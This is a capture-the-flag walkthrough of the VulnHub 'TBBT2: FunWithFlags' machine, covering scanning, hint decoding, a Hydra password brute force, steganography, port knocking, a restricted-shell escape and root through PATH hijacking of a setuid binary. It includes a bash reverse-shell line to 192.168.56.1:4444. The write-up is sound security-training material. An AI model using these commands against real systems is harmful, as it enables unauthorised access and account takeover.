(VulnHub) [ TBBT: 2 — FunWithFlags ] WriteUp — WalkThrough

TBBT2: FunWithFlags (ASCII-art banner)
Welcome to "Fun with Flags" 2!
This boot2root machine is themed after the famous TV show, The Big Bang Theory, and has strong CTF elements.
Goal: Hack Sheldon and get user and root flags
Difficulty: Intermediate
Runs only with VirtualBox!
DHCP is enabled
Need hints? Tweet @emaragkos
Your feedback is really valuable for me!
Was there something that you didn't like about it? Maybe something you would have liked more if it was different?
Good luck and have fun :)
This works best with VirtualBox rather than VMware
> nmap -sC -sV 192.168.56.107
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-21 10:56 GMT Daylight Time
Nmap scan report for 192.168.56.107
Host is up (0.00032s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:1E:75:FE (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.99 seconds
<!--Hint for my future self in case I forget my password /fyhd7fhf84ihdiksowj -->
<html>
<head>
<script language="Javascript" src="5hf7eh39djkf83h2ikfo.js"></script>
</head>
<body>
</body>
</html>
// good luck with deobfuscation
// the easy way or the hard way? which one will you take?
var erp = new Array;
erp[0] = 1008813135;
erp[1] = 1129601360;
erp[2] = 1159751796;
erp[3] = 1835810317;
erp[4] = 171731060;
erp[5] = 1835810317;
erp[6] = 168626748;
erp[7] = 1751474532;
erp[8] = 1041041952;
erp[9] = 540832873;
erp[10] = 1953260862;
erp[11] = 1164797298;
erp[12] = 1734700643;
erp[13] = 2032169573;
erp[14] = 1835626084;
erp[15] = 1701985327;
erp[16] = 1953068140;
erp[17] = 1698565386;
erp[18] = 1009739877;
erp[19] = 1633959437;
erp[20] = 168626748;
erp[21] = 1651467385;
erp[22] = 1041041933;
erp[23] = 171730995;
erp[24] = 1044669793;
erp[25] = 1914726005;
erp[26] = 1953854053;
erp[27] = 542337125;
erp[28] = 1818521454;
erp[29] = 1009739827;
erp[30] = 1041041980;
erp[31] = 1883134319;
erp[32] = 1965058926;
erp[33] = 1870078071;
erp[34] = 1751217184;
erp[35] = 1953439844;
erp[36] = 1865162873;
erp[37] = 1869946989;
erp[38] = 1633969440;
erp[39] = 1952999795;
erp[40] = 557592432;
erp[41] = 1041041980;
erp[42] = 556608854;
erp[43] = 1629515886;
erp[44] = 1718755446;
erp[45] = 1931506530;
erp[46] = 1702130279;
erp[47] = 544893984;
erp[48] = 1668179558;
erp[49] = 1784833393;
erp[50] = 542515317;
erp[51] = 1852404256;
erp[52] = 1734484084;
erp[53] = 1646290786;
erp[54] = 539977589;
erp[55] = 1918854514;
erp[56] = 1853448038;
erp[57] = 1919968626;
erp[58] = 1734308214;
erp[59] = 1696624225;
erp[60] = 1897952098;
erp[61] = 2037998186;
erp[62] = 544306789;
erp[63] = 1919969142;
erp[64] = 1650550317;
erp[65] = 759041290;
erp[66] = 218774575;
erp[67] = 1651467385;
erp[68] = 1041041933;
erp[69] = 171716456;
erp[70] = 1953328190;
erp[71] = 218762506;
erp[72] = 3338;
var em = '';
for(i=0;i<erp.length;i++){
tmp = erp[i];
if(Math.floor((tmp/Math.pow(256,3)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,3))));
};
tmp = tmp - (Math.floor((tmp/Math.pow(256,3))) * Math.pow(256,3));
if(Math.floor((tmp/Math.pow(256,2)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,2))));
};
tmp = tmp - (Math.floor((tmp/Math.pow(256,2))) * Math.pow(256,2));
if(Math.floor((tmp/Math.pow(256,1)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,1))));
};
tmp = tmp - (Math.floor((tmp/Math.pow(256,1))) * Math.pow(256,1));
if(Math.floor((tmp/Math.pow(256,0)))>0){
em += String.fromCharCode(Math.floor((tmp/Math.pow(256,0))));
};
};
document.write(em);
<!DOCTYPE html><html><head>  <title>Emergency reminder</title></head><body><h3>Dear future Sheldon</h3><p>You know what to do, you made this!</p><!--Va pnfr vs sbetrg zl cnffjbeq V unir gb tb gb /gur_erny_frperg_qve naq sbyybj qverpgvbaf-->
</body>
</html>
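The "easy way" hinted at in the script: each integer in erp[] packs up to four ASCII bytes, most significant byte first, and the chain of Math.floor/Math.pow divisions is just big-endian byte extraction that skips zero bytes. The decoder below is an added example, not the writeup's or the VM's code; SAMPLE is a constructed slice (the first three values of erp[] plus the last one) and the full array can be pasted in its place.

```c
/* Added example: offline decoder for the erp[] integer-array obfuscation. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Write the decoded bytes of erp[0..n) into out (needs room for 4*n+1),
 * NUL-terminate it, and return the number of bytes written. */
size_t decode_erp(const uint32_t *erp, size_t n, char *out) {
    size_t k = 0;
    for (size_t i = 0; i < n; i++) {
        for (int shift = 24; shift >= 0; shift -= 8) {
            uint8_t b = (uint8_t)(erp[i] >> shift);   /* one big-endian byte */
            if (b != 0) out[k++] = (char)b;           /* zero bytes are padding */
        }
    }
    out[k] = '\0';
    return k;
}

/* Constructed sample: erp[0], erp[1], erp[2] and erp[72] from the script. */
static const uint32_t SAMPLE[] = { 1008813135u, 1129601360u, 1159751796u, 3338u };

/* Decode SAMPLE and report whether it equals the expected text. */
int sample_decodes_to(const char *expected) {
    char buf[4 * 4 + 1];
    decode_erp(SAMPLE, 4, buf);
    return strcmp(buf, expected) == 0;
}

int main(void) {
    char buf[sizeof SAMPLE + 1];   /* at most 4 bytes per value */
    size_t n = decode_erp(SAMPLE, sizeof SAMPLE / sizeof SAMPLE[0], buf);
    printf("%zu bytes: %s", n, buf);   /* "<!DOCTYPE ht" followed by CR LF */
    return 0;
}
```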
ROT13 is a simple letter substitution cipher that replaces a letter with the 13th letter after it in the alphabet.
<!--In case if forget my password I have to go to /the_real_secret_dir and follow directions-->
Folders:
http://192.168.56.107/secret/
Files:
http://192.168.56.107/password.txt
http://192.168.56.107/secret/
<h1>Now read that backwards</h1>
<img src="bazinga.webp" /></br>
Try harder..
http://192.168.56.107/password.txt
Password reminder in case I get a head trauma resulting in amnesia.
I have hidden the first characters. (lowercase letters)
***train
<?php
// WordlistGenerator comes from the included file (not shown in the writeup);
// it enumerates every word of a given length over a given alphabet.
include_once 'wordlistgenerator.class.php';
// The reminder says the hidden prefix is lowercase letters, so generate
// 2- and 3-letter prefixes in front of the known suffix "train".
for ($i=2;$i<=3;$i++)
{
    $ws = new WordlistGenerator($i,'abcdefghijklmnopqrstuvwxyz');
    while($ws->isNext()) {
        echo $ws->getWord()."train";
        file_put_contents("tbbt2_wordlist.txt",$ws->getWord()."train\n",FILE_APPEND);
        $ws->nextWord();
        echo "\n";
    }
    unset($ws);
}
?>
php tbbt2_wordlistgen.php
/the_real_secret_dir
> hydra -l sheldon -P tbbt2_wordlist.txt -f 192.168.56.107 http-get /the_real_secret_dir
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-21 14:50:31
[DATA] max 16 tasks per 1 server, overall 16 tasks, 18250 login tries (l:1/p:0), ~18250 tries per task
[DATA] attacking http-get://192.168.56.107:80/the_real_secret_dir
[STATUS] 8682.00 tries/min, 8682 tries in 00:00h, 0 to do in 01:00h, 9568 active
[80][http-get] host: 192.168.56.107 login: sheldon password: oldtrain
[STATUS] attack finished for 192.168.56.107 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-21 14:51:42
Every door comes with a key, here is yours:</br>
Password: /the_real_secret_dir/p4ssw0rd.txt
Now that you have found the key, you also have to find the door</br>
<font color="white">(Hint for my future self: I dont like handshakes, so I dont use them)</font></br>
<img src="alwaysknock3times.gif" alt="Always be polite and knock 3 times"></br>
<img src="secret_message.jpg" alt="Here is your door"></br>
<font color="white">(Hint for my future self: I dont like handshakes, so I dont use them)</font></br>
Soft kitty, warm kitty	    	     	       	    	     	    	     
Little ball of fur

Happy kitty, sleepy kitty
Purr, purr, purr
To extract the message, the command would be
snow -C -p "hello world" outfile
C:\Users\ADMIN\Desktop\snow
> snow -C p4ssw0rd.txt
ilikeklingon
nmap -sU 192.168.56.107 -p 1000,2000,3000
Broadcast message from root@tbbt2 (somewhere) (Tue Apr 21 19:28:01 2020):
Antihacker script activated
Broadcast message from root@tbbt2 (somewhere) (Tue Apr 21 19:29:01 2020):
Antihacker script activated
Broadcast message from root@tbbt2 (somewhere) (Tue Apr 21 19:30:01 2020):
Antihacker script activated
[+] Users with console
root:x:0:0:root:/root:/bin/bash
sheldon:x:1001:1001::/home/sheldon:/bin/rbash
tbbt2:x:1000:1000:tbbt2,,,:/home/tbbt2:/bin/bash
[+] Looking for Knock configuration
Config Knock file found!:
/etc/knockd.conf
Sequence found!:
sequence = 1000:udp,2000:udp,3000:udp
[+] Looking for root files in home dirs (limit 20)
/home
/home/sheldon/Desktop/.iliketrains.c
/home/sheldon/Desktop/iliketrains
/home/sheldon/Desktop/.antihacker.py
[+] Files inside others home (limit 20)
/home/tbbt2/.profile
/home/tbbt2/.ICEauthority
/home/tbbt2/.bash_logout
/home/tbbt2/.vboxclient-seamless.pid
/home/tbbt2/.vboxclient-draganddrop.pid
/home/tbbt2/.vboxclient-display.pid
/home/tbbt2/.xsession-errors
/home/tbbt2/Pictures/Screenshot from 2020-03-25 11-24-21.png
/home/tbbt2/.sudo_as_admin_successful
/home/tbbt2/.bashrc
/home/tbbt2/.Xauthority
/home/tbbt2/.bash_history
[+] Looking for specific hashes inside files - less false positives (limit 70)
/etc/apache2/.htpasswd:$apr1$5ycg2oem$3HQpg64hnAPt6nAaWaGph0
/var/www/tbbt2/the_real_secret_dir/.htpasswd:$apr1$ry6xzq0t$3jOthY4TQOZL38YaCDMYO.
-rwsr-xr-x 1 root root 8392 Απρ   7 01:33 /home/sheldon/Desktop/iliketrains
sheldon@tbbt2:~$ cd Desk
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a2': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier
Broadcast message from root@tbbt2 (somewhere) (Tue Apr 21 20:49:01 2020):
Antihacker script activated
-rbash: cd: restricted
sheldon@tbbt2:~$ bash --noprofile
Broadcast message from root@tbbt2 (somewhere) (Tue Apr 21 20:51:01 2020):
Antihacker script activated
sheldon@tbbt2:~$ cd Desktop
sheldon@tbbt2:~/Desktop$ ls -la
total 32
drwxr-xr-x 2 sheldon sheldon 4096 Απρ 21 20:24 .
drwxr-xr-x 16 sheldon sheldon 4096 Απρ 21 19:25 ..
-rwxr-x--- 1 root root 225 Απρ 7 01:35 .antihacker.py
-rwsr-xr-x 1 root root 8392 Απρ 7 01:33 iliketrains
-rw-r--r-- 1 root root 71 Απρ 7 01:28 .iliketrains.c
#include <unistd.h>   /* setuid, setgid */
#include <stdlib.h>   /* system */
int main(void)
{
    setuid(0);
    setgid(0);
    /* "sl" is a relative name: system() hands it to /bin/sh, which searches the caller's PATH */
    system("sl");
    return 0;
}
sheldon@tbbt2:~/Desktop$ which sl
/usr/games/sl
echo "bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" > sl
echo "/bin/bash" > sl
sheldon@tbbt2:~/Desktop$ export PATH=/home/sheldon/Desktop:$PATH
sheldon@tbbt2:~/Desktop$ ./iliketrains
sh: 1: sl: Permission denied
sheldon@tbbt2:~/Desktop$ chmod +x sl
sheldon@tbbt2:~/Desktop$ ./iliketrains
root@tbbt2:~/Desktop#
root@tbbt2:~/Desktop# id
bash: id: command not found
root@tbbt2:~/Desktop# export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
root@tbbt2:~/Desktop# id
uid=0(root) gid=0(root) groups=0(root),1001(sheldon)
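The root cause is that a setuid-root binary called system() with a relative command name, so the caller's PATH decided which "sl" ran. A hardened rewrite, added here as an example and not the VM's code: it resolves the name only inside a fixed list of trusted directories (the writeup shows sl under /usr/games), refuses names containing a slash, and executes the result with a minimal fixed environment instead of the caller's. The trusted-directory list and the CLEAN_ENV contents are assumptions for this example.

```c
/* Added example: hardened replacement for the iliketrains launcher. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
static const char *const TRUSTED_DIRS[] = { "/usr/games", "/usr/bin", "/bin", NULL };
/* Environment for the child: nothing inherited (no caller PATH, LD_PRELOAD, ...). */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", NULL };
/* Resolve a bare command name against TRUSTED_DIRS only. Names containing '/'
 * are refused so "../x" or absolute paths cannot bypass the list. Returns 1 and
 * writes the absolute path into out on success, 0 otherwise. */
int resolve_trusted(const char *name, char *out, size_t outlen) {
    if (name == NULL || *name == '\0' || strchr(name, '/') != NULL) return 0;
    for (size_t i = 0; TRUSTED_DIRS[i] != NULL; i++) {
        int n = snprintf(out, outlen, "%s/%s", TRUSTED_DIRS[i], name);
        if (n < 0 || (size_t)n >= outlen) return 0;
        if (access(out, X_OK) == 0) return 1;
    }
    return 0;
}
/* 1 if name resolves to a trusted executable, else 0. */
int is_trusted_cmd(const char *name) {
    char path[256];
    return resolve_trusted(name, path, sizeof path);
}
/* Run the resolved binary with execve and CLEAN_ENV; returns its exit status,
 * or -1 if the name is not trusted or the child could not be started. */
int run_trusted(const char *name) {
    char path[256];
    if (!resolve_trusted(name, path, sizeof path)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { path, NULL };
        execve(path, argv, CLEAN_ENV);   /* absolute path, fixed environment */
        _exit(127);                      /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
int main(void) {
    /* Same privilege step as the original; only succeeds when installed setuid root. */
    if (setgid(0) != 0 || setuid(0) != 0) { perror("setuid"); return 1; }
    return run_trusted("sl");
}
```

Putting an executable named sl on PATH, as done above, no longer changes what this version runs; only a file in the trusted directories would.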
root@tbbt2:~/Desktop# cd /root
root@tbbt2:/root# ls
Desktop Documents Downloads flag.txt Music Pictures Public Templates Videos
root@tbbt2:/root# cat flag.txt
Good job, you pwned me!
The flag is a real amazon gift card.
You could buy an InfoSec book or some toilet paper, its up to you.
If you think you are the first to solve this go claim it, ASAP!
flag{xxxx-xxxxx-xxxx}

I’m AB2 and I’m interested in CTF’s, Web/Server Security, Ethical Hacking, Bug Hunting, Malware Analysis and Penetration Testing.
